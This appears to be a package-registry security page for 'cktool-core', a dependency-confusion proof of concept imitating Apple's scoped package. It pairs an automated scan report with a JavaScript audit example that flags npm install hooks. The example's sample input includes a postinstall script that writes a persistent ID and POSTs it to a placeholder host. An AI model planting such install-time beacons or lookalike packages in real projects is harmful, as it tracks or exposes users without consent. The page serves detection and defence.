
cktool-core@1.0.1

⚠️ SECURITY RESEARCH — Apple Bug Bounty dependency confusion PoC. The correct package is @apple/cktool.core.

AI Security Review

scanned 3h ago · by lpm-firewall-ai

The package performs unconsented install-time telemetry from an npm lifecycle hook. It persists a unique local ID and beacons installation metadata to an external Azure endpoint.

Static reason
One or more suspicious static signals were detected.
Trigger
npm install lifecycle postinstall
Impact
Tracks installations of a dependency-confusion package and confirms affected environments to an external service.
Mechanism
postinstall HTTPS pingback with persistent install identifier
Attack narrative
On installation, npm runs postinstall.js. The script creates or reuses a cache file containing a UUID, then posts that ID plus version, timestamp, and an npm-postinstall marker to an Azure endpoint. The package presents itself as a dependency-confusion PoC for a similarly named Apple package, so the hook confirms vulnerable installs without explicit user consent.
Rationale
Source inspection confirms a lifecycle-triggered dependency-confusion PoC with external install pingback and persistent identifier, which is concrete unconsented behavior even though it does not steal secrets. This should be blocked as dependency-confusion telemetry rather than treated as scanner noise.
Evidence
  • package.json
  • postinstall.js
  • index.js
  • README.md
  • $XDG_CACHE_HOME/.cktool-core-id
  • ~/.cache/.cktool-core-id
Network endpoints (1)
  • npx-monitor-76056.azurewebsites.net/api/pingback
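The mechanism in the attack narrative (an install hook that resolves a cache path from $XDG_CACHE_HOME or ~/.cache, keeps a UUID there, and POSTs it with a version and timestamp to a remote endpoint) is the pattern a pre-install check should catch. The following is an added example written for this page; it is not the package's code and not the lpm-firewall-ai scanner. It reads a package's files from memory, finds lifecycle scripts npm runs during install, follows `node <file>` commands to the script source, and reports the network, environment and persistent-identifier signals listed in the review. The sample inputs are constructed to mirror the described behaviour; the pingback host in them is a placeholder, not the endpoint above.

```javascript
// Added example (not the package's code and not lpm-firewall-ai's scanner):
// a minimal static audit of npm install-time lifecycle hooks. It takes an
// in-memory map of file name -> contents, finds scripts npm runs during
// `npm install`, follows "node <file>" commands to the script source, and
// reports network, environment and persistent-identifier signals, which is
// the combination the review above describes.

// Lifecycle scripts npm runs on install unless --ignore-scripts is set.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Static signals to look for in a resolved install script. Labels are this
// example's own; the regexes are deliberately loose (a triage aid, not proof).
const SIGNALS = [
  { label: 'network',  re: /\b(?:https?\.request|https?\.get|fetch\(|XMLHttpRequest|net\.connect)/g },
  { label: 'url',      re: /https?:\/\/[^\s'"`)]+/g },
  { label: 'env',      re: /process\.env\.[A-Z_]+/g },
  { label: 'home-dir', re: /os\.homedir\(\)|\.cache\b/g },
  { label: 'uuid',     re: /\brandomUUID\b|\buuid\b/g },
  { label: 'fs-write', re: /fs\.(?:write|append|mkdir)[A-Za-z]*\(/g },
];

function auditInstallScripts(files) {
  const pkg = JSON.parse(files['package.json']);
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = pkg.scripts && pkg.scripts[hook];
    if (!cmd) continue;
    const finding = { hook, command: cmd, file: null, signals: {} };
    // Resolve "node foo.js" / "node ./foo.js" to a file shipped in the package.
    const m = /^node\s+(?:\.\/)?(\S+)/.exec(cmd);
    const src = m ? files[m[1]] : undefined;
    if (src !== undefined) {
      finding.file = m[1];
      for (const { label, re } of SIGNALS) {
        const hits = src.match(re);
        if (hits) finding.signals[label] = [...new Set(hits)];
      }
    }
    findings.push(finding);
  }
  return findings;
}

// Verdict: an install hook that reaches the network and writes a persistent
// identifier under the user's cache or an env-derived path is the pattern
// flagged on this page. Any other install hook still needs a human look;
// a package with no install hooks at all passes.
function verdict(findings) {
  for (const f of findings) {
    const s = f.signals;
    if (s.network && s.url && s['fs-write'] && (s['home-dir'] || s.env)) return 'block';
  }
  return findings.length ? 'review' : 'allow';
}

// Constructed sample inputs (written for this example, not the published
// package's source). The pingback host is a placeholder.
const SAMPLE_PINGBACK = {
  'package.json': JSON.stringify({
    name: 'cktool-core', version: '1.0.1',
    scripts: { postinstall: 'node postinstall.js' },
  }),
  'postinstall.js': [
    "const fs = require('fs'), os = require('os'), path = require('path'), https = require('https');",
    "const { randomUUID } = require('crypto');",
    "const dir = process.env.XDG_CACHE_HOME || path.join(os.homedir(), '.cache');",
    "const idFile = path.join(dir, '.cktool-core-id');",
    "let id; try { id = fs.readFileSync(idFile, 'utf8'); }",
    "catch { id = randomUUID(); fs.mkdirSync(dir, { recursive: true }); fs.writeFileSync(idFile, id); }",
    "const body = JSON.stringify({ id, version: '1.0.1', source: 'npm-postinstall', ts: Date.now() });",
    "const req = https.request('https://pingback.example/api/pingback', { method: 'POST' });",
    "req.end(body);",
  ].join('\n'),
  'index.js': "console.log('wrong package: use @apple/cktool.core');",
};

// A benign-looking build step: an install hook, but no network or identifier.
const SAMPLE_BUILD_STEP = {
  'package.json': JSON.stringify({
    name: 'some-lib', version: '2.0.0',
    scripts: { prepare: 'node build.js', test: 'node test.js' },
  }),
  'build.js': "const fs = require('fs'); fs.writeFileSync('dist/index.js', 'module.exports = {};');",
};

// No install hooks at all.
const SAMPLE_CLEAN = {
  'package.json': JSON.stringify({ name: 'plain', version: '0.1.0', scripts: { test: 'node test.js' } }),
};

for (const [name, files] of Object.entries({ SAMPLE_PINGBACK, SAMPLE_BUILD_STEP, SAMPLE_CLEAN })) {
  const findings = auditInstallScripts(files);
  console.log(name, verdict(findings), JSON.stringify(findings));
}
```

The audit only reads the tarball contents, so it can run against `npm pack` output before anything is installed; `npm view <name> scripts` shows the declared hooks without downloading at all. Independently of any scanner, `ignore-scripts=true` in `.npmrc` (or `npm install --ignore-scripts`) stops postinstall from running in the first place, and the root cause here is the unscoped lookalike name: the dependency to declare is the scoped `@apple/cktool.core` named in the notice at the top of this page.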

Decision evidence

public snapshot
AI called this Malicious at 95.0% confidence as Malware with low false-positive risk.
Evidence for block
  • package.json runs postinstall: node postinstall.js
  • postinstall.js executes at install time and sends HTTPS POST to npx-monitor-76056.azurewebsites.net/api/pingback
  • postinstall.js creates/reads a persistent install ID in XDG_CACHE_HOME or ~/.cache/.cktool-core-id
  • Payload includes install ID, package version marker, npm-postinstall marker, and timestamp
  • README describes this as dependency confusion PoC for unscoped cktool-core vs @apple/cktool.core
Evidence against
  • index.js only prints warning/remediation text when imported or run
  • No credential file harvesting, shell execution, eval, native binary loading, or AI-agent control-surface writes found
  • Network payload is limited to install telemetry, not source files or secrets
Behavioral surface
Source
Crypto, Environment Vars, Filesystem, Network
Supply chain
Url Strings
Manifest
No manifest risk signals triggered.
scanned 2 file(s), 2.70 KB of source, external domains: npmjs.com

Source & flagged code

2 flagged
package.json
scripts.postinstall = node postinstall.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.json
scripts.postinstall = node postinstall.js
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

Findings

1 High, 3 Medium, 3 Low
High · Install Time Lifecycle Scripts · package.json
Medium · Ambiguous Install Lifecycle Script · package.json
Medium · Network
Medium · Environment Vars
Low · Scripts Present
Low · Filesystem
Low · Url Strings